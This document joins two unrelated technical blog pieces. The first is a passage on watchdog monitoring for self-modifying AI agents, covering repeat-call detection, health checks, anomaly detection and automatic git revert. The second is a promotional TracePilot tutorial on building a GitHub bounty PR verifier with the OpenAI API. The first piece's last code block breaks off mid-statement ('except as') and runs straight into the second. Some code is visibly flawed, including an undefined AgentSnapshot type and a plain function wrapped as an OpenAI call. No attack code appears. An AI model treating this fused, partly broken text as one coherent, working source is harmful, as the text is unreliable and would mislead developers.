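        self.max_repeats = max_repeats
        self.window_seconds = window_seconds  # look-back window used by check()
        self.call_history = deque(maxlen=100)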

    def check(self, tool_name: str, args: dict) -> bool:
        self.call_history.append((tool_name, args, time.time()))

        # Count identical calls in window
        recent = [c for c in self.call_history 
                  if c[2] > time.time() - self.window_seconds]

        repeats = sum(1 for c in recent 
                     if c[0] == tool_name and c[1] == args)

        return repeats >= self.max_repeats

Simple. Effective. Catches the "call the same search API with the same query 47 times" pattern.
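The window logic is easier to test if the clock is passed in rather than read from `time.time()`. Here's a sketch of that variant. `RepeatCounter` is a hypothetical name, and it assumes tool arguments are JSON-serializable so each call can be reduced to a hashable fingerprint that is also easy to log.

```python
import json
from collections import deque


class RepeatCounter:
    """Sliding-window counter for identical tool calls (hypothetical helper)."""

    def __init__(self, max_repeats: int = 5, window_seconds: float = 60.0):
        self.max_repeats = max_repeats
        self.window_seconds = window_seconds
        self.calls: deque = deque()

    def check(self, tool_name: str, args: dict, now: float) -> bool:
        # Canonical JSON gives a stable, hashable fingerprint for the call.
        fingerprint = (tool_name, json.dumps(args, sort_keys=True))
        self.calls.append((fingerprint, now))
        # Drop calls that have fallen out of the window.
        while self.calls and self.calls[0][1] <= now - self.window_seconds:
            self.calls.popleft()
        repeats = sum(1 for fp, _ in self.calls if fp == fingerprint)
        return repeats >= self.max_repeats


counter = RepeatCounter(max_repeats=3, window_seconds=60)
results = [counter.check("search", {"q": "mcp", "limit": 10}, now=t) for t in (0, 10, 20)]
print(results)  # [False, False, True]
late = counter.check("search", {"q": "mcp", "limit": 10}, now=200)
print(late)     # False: the earlier calls have expired
```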

2. Health Check

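import asyncio
import time
from dataclasses import dataclass
from typing import Any, Optional

@dataclass
class HealthStatus:
    alive: bool
    latency_ms: Optional[float] = None
    last_response: Any = None
    error: Optional[str] = None

class HealthChecker: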
    def __init__(self, timeout_seconds: int = 30):
        self.timeout = timeout_seconds

    async def check(self, agent) -> HealthStatus:
        try:
            start = time.time()
            response = await asyncio.wait_for(
                agent.ping(), 
                timeout=self.timeout
            )
            latency = time.time() - start

            return HealthStatus(
                alive=True,
                latency_ms=latency * 1000,
                last_response=response
            )
        except asyncio.TimeoutError:
            return HealthStatus(alive=False, error="timeout")
        except Exception as e:
            return HealthStatus(alive=False, error=str(e))

Ping the LLM. If it doesn't respond in 30 seconds, something's wrong. Don't wait for the user to notice.

3. Anomaly Detection

from collections import deque

class AnomalyDetector:
    def __init__(self, baseline_window: int = 100):
        self.baseline = deque(maxlen=baseline_window)
        self.threshold_multiplier = 3.0  # Standard deviation multiplier

    def update_baseline(self, metrics: dict):
        self.baseline.append(metrics)

    def is_anomalous(self, current: dict) -> bool:
        if len(self.baseline) < 10:
            return False  # Not enough data yet

        for key in current:
            values = [m[key] for m in self.baseline if key in m]
            if not values:
                continue

            mean = sum(values) / len(values)
            variance = sum((v - mean) ** 2 for v in values) / len(values)
            std_dev = variance ** 0.5

            if abs(current[key] - mean) > self.threshold_multiplier * std_dev:
                return True

        return False

Token count suddenly 10x normal? Latency spiking? Cost per step went from $0.02 to $0.50? Flag it.
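To see the three-sigma rule with real numbers, here's a worked example on a made-up baseline of tokens per step. The figures are illustrative, not measurements. `pstdev` is the population standard deviation, which matches the variance formula in the class above.

```python
from statistics import mean, pstdev

# Hypothetical tokens-per-step readings from ten healthy steps
baseline = [1900, 2000, 2100, 2050, 1950, 2000, 1980, 2020, 2010, 1990]
mu = mean(baseline)
sigma = pstdev(baseline)


def is_outlier(value: float, k: float = 3.0) -> bool:
    """True when value sits more than k standard deviations from the mean."""
    return abs(value - mu) > k * sigma


print(mu, round(sigma, 1))
print(is_outlier(2100))   # False
print(is_outlier(20000))  # True
```

One edge case to keep in mind: if the baseline is perfectly flat, sigma is 0 and any change at all gets flagged. A minimum floor on sigma is one way to handle that.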

The Automatic Response

Detection is useless without action. Here's what you do:

import subprocess

class WatchdogAction:
    def __init__(self, agent, git_repo: str):
        self.agent = agent  # needed by handle_anomaly() to stop the run
        self.repo = git_repo

    async def handle_anomaly(self, snapshot: AgentSnapshot):
        # 1. Log everything
        await self.log_incident(snapshot)

        # 2. Kill the current execution
        await self.agent.stop()

        # 3. Revert to last known good state
        last_good = await self.find_last_good_commit()
        await self.git_revert(last_good)

        # 4. Notify
        await self.send_alert(snapshot)

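    async def git_revert(self, commit_hash: str):
        # Revert every commit made after the last good one. Reverting commit_hash
        # itself would undo the good state instead of restoring it.
        subprocess.run(["git", "revert", "--no-commit", f"{commit_hash}..HEAD"],
                       check=True)
        subprocess.run(["git", "commit", "-m",
                       "auto-revert: watchdog detected anomaly"], check=True)
        subprocess.run(["git", "push"], check=True)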

Four steps. Log it. Stop the bleeding. Revert the damage. Tell someone.

The Hard Parts

This sounds simple. It's not. Two things will bite you.

False positives. Your anomaly detector flags a legit spike in usage. Now you've killed a running agent and reverted configs for nothing. Solution: require multiple consecutive anomalies before acting. Or use a confirmation window.

What's "good"? The agent modifies itself constantly. Which commit is the "last good" one? You need a baseline — a snapshot taken right after deployment, before any self-modification. Mark it as golden.

import subprocess

class GoldenBaseline:
    def __init__(self):
        self.golden_commit = None

    def mark_golden(self):
        result = subprocess.run(["git", "rev-parse", "HEAD"], 
                               capture_output=True, text=True)
        self.golden_commit = result.stdout.strip()
        subprocess.run(["git", "tag", "golden", self.golden_commit])
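For the false-positive problem, the "multiple consecutive anomalies" rule can be sketched as a small gate that sits between the detector and the kill switch. `ConsecutiveGate` is a hypothetical name, and the threshold of three is an arbitrary assumption.

```python
class ConsecutiveGate:
    """Fire only after `required` anomalous checks in a row (hypothetical helper)."""

    def __init__(self, required: int = 3):
        self.required = required
        self.streak = 0

    def observe(self, anomalous: bool) -> bool:
        # Any normal reading resets the streak.
        self.streak = self.streak + 1 if anomalous else 0
        return self.streak >= self.required


gate = ConsecutiveGate(required=3)
signals = [True, False, True, True, True]
decisions = [gate.observe(s) for s in signals]
print(decisions)  # [False, False, False, False, True]
```

The trade-off is latency: with a 5-second poll interval, requiring three hits in a row delays the response by at least two extra polls.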

What This Looks Like in Practice

An agent runs for 6 hours. It's modified its system prompt 12 times. Token count per step is stable at ~2K. Then it hits a weird edge case. The self_modify tool runs and sets max_tokens to 999999. Next LLM call tries to generate a million tokens. Cost spikes from $0.03 to $15 per step.

The watchdog catches it. Token count is 500x baseline. Latency is 30x normal. It kills the agent, reverts to the golden commit, and sends a Slack message. Total time from anomaly to recovery: 12 seconds.

Without the watchdog? Someone notices the billing alert 4 hours later.

The Missing Piece

You need one more thing. The watchdog itself needs monitoring. If it crashes, you're blind.


class WatchdogSupervisor:
    def __init__(self):
        self.watchdog = AgentWatchdog()
        self.heartbeat_interval = 5  # seconds

    async def run(self):
        while True:
            try:
                await asyncio.wait_for(
                    self.watchdog.monitor(),
                    timeout=self.heartbeat_interval * 3
                )
            except as


Build a Bounty Verification Agent That Tests PRs & Validates Evidence

Tracepilot — Sat, 20 Jun 2026 01:22:42 +0000

Build a Bounty Verification Agent That Tests PRs & Validates Evidence

What we're building: An automated agent that verifies submitted GitHub bounty PRs, runs tests, captures evidence, and produces a clear QA report — all in one traceable pipeline.

Prerequisites

Node.js 18+
A GitHub personal access token (with repo scope)
A TracePilot API key (free tier works)
An OpenAI API key

Step 1: Set Up Your Project

mkdir bounty-verifier
cd bounty-verifier
npm init -y
npm pkg set type=module   # the files below use ES module import syntax
npm install openai tracepilot-sdk node-fetch

Create your environment file:

# .env
GITHUB_TOKEN=ghp_your_token_here
OPENAI_API_KEY=sk-your-key
TRACEPILOT_API_KEY=tp_live_your_key

Step 2: Build the PR Verification Core

Create verifier.js — this is where the actual testing logic lives:

import fetch from 'node-fetch';

export async function verifyPR(prUrl) {
  // Parse owner/repo/PR number from URL
  const match = prUrl.match(/github\.com\/([^/]+)\/([^/]+)\/pull\/(\d+)/);
  if (!match) throw new Error('Invalid PR URL');

  const [, owner, repo, prNumber] = match;

  // Fetch PR details
  const prRes = await fetch(
    `https://api.github.com/repos/${owner}/${repo}/pulls/${prNumber}`,
    { headers: { Authorization: `token ${process.env.GITHUB_TOKEN}` } }
  );
  const pr = await prRes.json();

  // Check mergeable status
  if (pr.mergeable === false) {
    return {
      passed: false,
      evidence: { mergeConflict: true },
      summary: '❌ PR has merge conflicts'
    };
  }

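  // Get check runs for the PR's head commit
  // (the pull request payload has no checks_url field, so build the URL from head.sha)
  const checksRes = await fetch(
    `https://api.github.com/repos/${owner}/${repo}/commits/${pr.head.sha}/check-runs`,
    { headers: { Authorization: `token ${process.env.GITHUB_TOKEN}` } }
  );
  const checks = await checksRes.json();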

  const allPassed = checks.check_runs.every(
    run => run.conclusion === 'success'
  );

  return {
    passed: allPassed,
    evidence: {
      prTitle: pr.title,
      mergeable: pr.mergeable,
      checksPassed: allPassed,
      totalChecks: checks.check_runs.length,
      failedChecks: checks.check_runs
        .filter(r => r.conclusion !== 'success')
        .map(r => ({ name: r.name, status: r.conclusion }))
    },
    summary: allPassed 
      ? `✅ ${checks.check_runs.length} checks passed`
      : `❌ Some checks failed`
  };
}
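
One thing to watch: comparing every conclusion to 'success' marks skipped or neutral checks as failures, and a PR with zero check runs counts as passing. Here is a sketch of a stricter summary. summarizeChecks is a hypothetical helper, and treating neutral and skipped as non-blocking is an assumption you may want to change for your bounty rules:

```javascript
// Assumption: these conclusions do not block a payout. Adjust to taste.
const NON_BLOCKING = new Set(['success', 'neutral', 'skipped']);

// Takes the check_runs array from GitHub's check-runs response.
function summarizeChecks(checkRuns) {
  // Runs that have not finished yet have a status other than 'completed'.
  const pending = checkRuns.filter(run => run.status !== 'completed');
  const failed = checkRuns.filter(
    run => run.status === 'completed' && !NON_BLOCKING.has(run.conclusion)
  );
  return {
    total: checkRuns.length,
    pending: pending.map(run => run.name),
    failed: failed.map(run => ({ name: run.name, conclusion: run.conclusion })),
    // An empty list is not a pass: no CI ran, so nothing was verified.
    passed: checkRuns.length > 0 && pending.length === 0 && failed.length === 0
  };
}
```

In verifyPR you could call summarizeChecks(checks.check_runs) and use its passed field in place of allPassed.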

Step 3: Add the AI Analysis Layer

Create analyzer.js. This makes the agent smart enough to check the PR content against the bounty requirements:

import OpenAI from 'openai';

const openai = new OpenAI({ apiKey: process.env.OPENAI_API_KEY });

export async function analyzePR(prData, bountyRequirements) {
  const response = await openai.chat.completions.create({
    model: 'gpt-4o-mini',
    messages: [
      {
        role: 'system',
        content: 'You are a QA bounty verifier. Analyze PRs against bounty requirements. Respond in JSON with: { passed: boolean, reasoning: string, evidence: object }'
      },
      {
        role: 'user',
        content: `Bounty requirements: ${bountyRequirements}\n\nPR data: ${JSON.stringify(prData, null, 2)}`
      }
    ],
    response_format: { type: 'json_object' }
  });

  return JSON.parse(response.choices[0].message.content);
}
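
JSON mode asks the model for valid JSON, but it does not guarantee the fields you requested are present or correctly typed. Here is a sketch of a defensive parser; parseVerdict is a hypothetical helper, and treating a malformed reply as a failed verification is an assumption, not something the OpenAI SDK does for you:

```javascript
// Hypothetical helper: turn the raw model reply into a safe, predictable verdict.
function parseVerdict(raw) {
  let data;
  try {
    data = JSON.parse(raw);
  } catch (err) {
    // Truncated or non-JSON output: never approve a bounty on it.
    return { passed: false, reasoning: `Model returned invalid JSON: ${err.message}`, evidence: {} };
  }
  const validShape =
    data !== null &&
    typeof data === 'object' &&
    typeof data.passed === 'boolean' &&
    typeof data.reasoning === 'string';
  if (!validShape) {
    return { passed: false, reasoning: 'Model response is missing required fields', evidence: {} };
  }
  // evidence is optional here; default to an empty object when absent or not an object.
  const evidence =
    typeof data.evidence === 'object' && data.evidence !== null ? data.evidence : {};
  return { passed: data.passed, reasoning: data.reasoning, evidence };
}
```

In analyzePR you could return parseVerdict(response.choices[0].message.content) instead of calling JSON.parse directly.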

Step 4: Wire Everything Together with TracePilot

This is where the magic happens. Create verifier-agent.js (the file index.js imports in Step 5). Every step gets traced, so you can pinpoint which one failed:

import { TracePilot } from 'tracepilot-sdk';
import { verifyPR } from './verifier.js';
import { analyzePR } from './analyzer.js';

const tp = new TracePilot(process.env.TRACEPILOT_API_KEY);

// Exported so index.js can import it
export async function verifyBountyPR(prUrl, bountyRequirements) {
  await tp.startTrace('bounty-verifier');

  // Step 1: Fetch and verify PR
  const { result: prResult, spanId: prSpan } = await tp.wrapOpenAI(
    () => verifyPR(prUrl),
    [{ role: 'user', content: `Verify PR: ${prUrl}` }],
    null,
    1
  );

  if (!prResult.passed) {
    return prResult; // Early exit with evidence
  }

  // Step 2: AI analysis of PR against requirements
  const { result: analysis, spanId: analysisSpan } = await tp.wrapOpenAI(
    () => analyzePR(prResult.evidence, bountyRequirements),
    [{ role: 'user', content: 'Analyze PR against bounty requirements' }],
    prSpan,  // Link to parent span
    2
  );

  // Step 3: Generate final report
  const { result: report } = await tp.wrapToolCall(
    'generate-report',
    () => generateReport(prUrl, prResult, analysis),
    analysisSpan,
    3,
    false  // Not destructive: just generating text
  );

  return report;
}

// prUrl is passed in explicitly because it is not otherwise in scope here
function generateReport(prUrl, prResult, analysis) {
  return {
    timestamp: new Date().toISOString(),
    prUrl,
    prTitle: prResult.evidence.prTitle,
    technicalChecks: prResult.passed ? '✅ All passing' : '❌ Some failed',
    aiAnalysis: analysis.passed ? '✅ Meets requirements' : '❌ Needs revision',
    evidence: {
      githubChecks: prResult.evidence,
      aiReasoning: analysis.reasoning
    },
    verdict: (prResult.passed && analysis.passed) 
      ? '✅ APPROVED — Ready for bounty payout'
      : '❌ REJECTED — See details above',
    bountyAmount: '300 MRG'
  };
}
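
The report object is handy for machines, but a bounty reviewer will probably want something readable. Here is a sketch that flattens it into plain text, for example to paste into a PR comment. formatReport is a hypothetical helper and assumes the report shape produced by generateReport above:

```javascript
// Hypothetical helper: render the report object as a short plain-text summary.
function formatReport(report) {
  // failedChecks comes from the verifier's evidence; default to none if absent.
  const failed = report.evidence.githubChecks.failedChecks || [];
  const lines = [
    `QA report for ${report.prTitle}`,
    `Generated: ${report.timestamp}`,
    `Technical checks: ${report.technicalChecks}`,
    `AI analysis: ${report.aiAnalysis}`,
    `Reasoning: ${report.evidence.aiReasoning}`,
    // One line per failed check, so the contributor knows what to fix.
    ...failed.map(check => `Failed check: ${check.name} (${check.status})`),
    `Verdict: ${report.verdict}`
  ];
  return lines.join('\n');
}
```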

Step 5: Run It

// index.js
import 'dotenv/config';
import { verifyBountyPR } from './verifier-agent.js';

const prUrl = 'https://github.com/mergeos-bounties/mergeos/pull/64';
const requirements = `
- PR must pass all CI checks
- Code must be well-documented
- Must include test coverage
- No merge conflicts
`;

verifyBountyPR(prUrl, requirements)
  .then(report => console.log(JSON.stringify(report, null, 2)))
  .catch(console.error);

Then run it from the project root:

node index.js

Adding Observability

You already have TracePilot wired in. Here's what happens:

Every step is traced — PR fetch, AI analysis, report generation
Token costs tracked — See exactly how much each AI call cost
Time-travel debugging — If the AI analysis fails, open the dashboard, fork the trace at step 2, edit the prompt, and replay

A small change adds more visibility:

// Before — standard logging
console.log('PR verified:', prResult);

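// After: trace it
// parentSpanId is the spanId returned by an earlier wrapped call (for example, analysisSpan in Step 4)
const { spanId } = await tp.wrapToolCall('log-verification',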
  () => console.log('PR verified:', prResult),
  parentSpanId,
  4
);

Open tracepilotai.com/dashboard — every verification run appears as a structured trace. Click into any span to see exact inputs, outputs, and timing.

Next Steps

You got this. Here's what to do next:

Add more checks — Clone the repo, run tests locally, verify diff size
Add bounty evidence capture — Screenshot passing checks, save test output as artifacts
Build a web dashboard
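
The diff-size check is a good first one to add, since GitHub's pull request response already includes additions, deletions, and changed_files. Here is a minimal sketch; checkDiffSize and its default limits are hypothetical, so pick thresholds that fit your bounties:

```javascript
// Hypothetical helper: flag PRs that are too large to review reliably.
// pr is the JSON object returned by GitHub's "get a pull request" endpoint.
function checkDiffSize(pr, limits = { maxChangedLines: 1000, maxFiles: 50 }) {
  const changedLines = pr.additions + pr.deletions;
  const problems = [];
  if (changedLines > limits.maxChangedLines) {
    problems.push(`${changedLines} changed lines exceeds limit of ${limits.maxChangedLines}`);
  }
  if (pr.changed_files > limits.maxFiles) {
    problems.push(`${pr.changed_files} changed files exceeds limit of ${limits.maxFiles}`);
  }
  return {
    passed: problems.length === 0,
    changedLines,
    changedFiles: pr.changed_files,
    problems
  };
}
```

You could merge its result into the evidence object that verifyPR returns, so the AI analysis and the final report both see it.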

Debugging AI agents shouldn't feel like reading The Matrix.
Join other engineers who are building reliable autonomous workflows in our community: TracePilot Discord